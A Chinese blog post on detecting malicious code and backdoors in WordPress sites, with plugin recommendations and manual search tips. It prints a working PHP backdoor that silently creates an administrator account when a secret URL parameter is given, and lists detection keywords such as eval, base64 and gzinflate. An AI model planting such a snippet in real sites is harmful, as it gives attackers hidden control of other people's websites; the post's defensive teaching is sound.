首页 网站建设 Wordpress 浏览内容

wordpress检测是否存在恶意代码的方法

1865 0 BaiDu已收录 评论留言

WordPress目前为止仍然是最大的博客网站建设平台,在全球的网站中有5成以上使用的 WordPress 建站程序。WordPress 如此受欢迎,因此它会更加受到不法分子的青睐。

网站帐号被盗,意味着你的网站可能被人利用做各种勾当,而你可能被蒙在鼓里,这个我想大部分人无法接受。
作为经常使用WordPress的人可能很清楚,自己的后台经常被各种暴力破解、各种广告垃圾、各种恶意注册,还有经常会发现一些主题插件含有恶意代码。

wordpress恶意代码

wordpress恶意代码

一个简单的 WordPress 后门:

add_action( 'wp_head', 'my_backdoor' );function my_backdoor() { if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { require( 'wp-includes/registration.php' ); if ( !username_exists( 'backdoor' ) ) { $user_id = wp_create_user( 'backdoor', 'pa55w0rd!' ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } }}

这段代码作用不言而喻:通常放在 functions.php,通过访问http://www.yoursitename.com/?backdoor=go就可以创建一个管理员的帐号。

那么到底什么是后门?

后门程序( Backdoor )是指绕开正常验证过程并获得服务器的远程访问权限,且WordPress站点管理员无法立即发现。大部分黑客在攻击站点时都是先上传后门程序,即使管理员发现并删除了这些不良插件,黑客还是能重新获得访问权限的。且后门程序在网站升级中也不会被破坏,除非完全清理干净它,否则用户的网站始终暴露在黑客的攻击之下。

有些简单的后门程序仅仅能创建隐藏的管理员用户名,而更复杂后门程序甚至能让黑客执行任何从浏览器端发送的PHP代码。还有一些有完整用户界面的后门程序,可以让黑客用你的服务器发送电子邮件、执行SQL查询或任何他们想做的事情。

黑客主要会通过主题(漏洞)、插件(漏洞)、上传目录、wp-config.php 文件等等去进行后门程序的安装运行,或者在其他的一些其他文件夹里伪装 Worpdress 文件,让一般人看起来像是 WordPress 本身的文件,当然方法不仅限于此。

检测wordpress是否有后门:

在线网站检测:
https://www.virustotal.com/zh-cn

安全插件推荐:
1、TAC插件:https://wordpress.org/plugins/tac
很简单,很强大,启用后,如果主题旁边有个绿框框,就比较安全,如果有粉色框框,需要仔细检测。
2、Wordfence Security:https://wordpress.org/plugins/wordfence
比较放心的安全软件。

手动检测

1、使用ftp工具查看源码:找到fuctions.php这个文件,查看是否包含以下函数:

function __popular_postsfunction striposfunction scandirfunction _getprepare_widgetadd_action("init", "_getprepare_widget");function _get_allwidgets_contfunction strriposfunction _checkactive_widgetsadd_action("admin_head", "_checkactive_widgets

2、看php文件有没有加密的,用search&replace这类的软件搜索整个目录
使用zend,ionCube,eval,base64,gzinflate分别做关键词,查看是否有加密的代码 (UltraEdit32可以对某个目录下的所有文件,以及所有子目录下的所有文件进行搜索)

3、如果有加密的就dezend

4、再搜索mail,curl,看有没有自动发邮件、开网页的行为

5、最后搜搜url,看看有没有偷偷加链接

标签:
墨月的头像
  • 本文由墨月网络整理编辑,转载请以链接形式注明本文地址:https://www.moyoo.net/12353.html
    版权所有© 墨月网络 | 本文采用 BY-NC-SA 进行授权丨发布于:2015-11-23 16:58
    若未注明,均为原创;部分内容源于网络,版权归原作者所有,如有侵权,请联系我们删除。
已有 0 条评论 新浪微博

关注我们,实时联系

AD

AD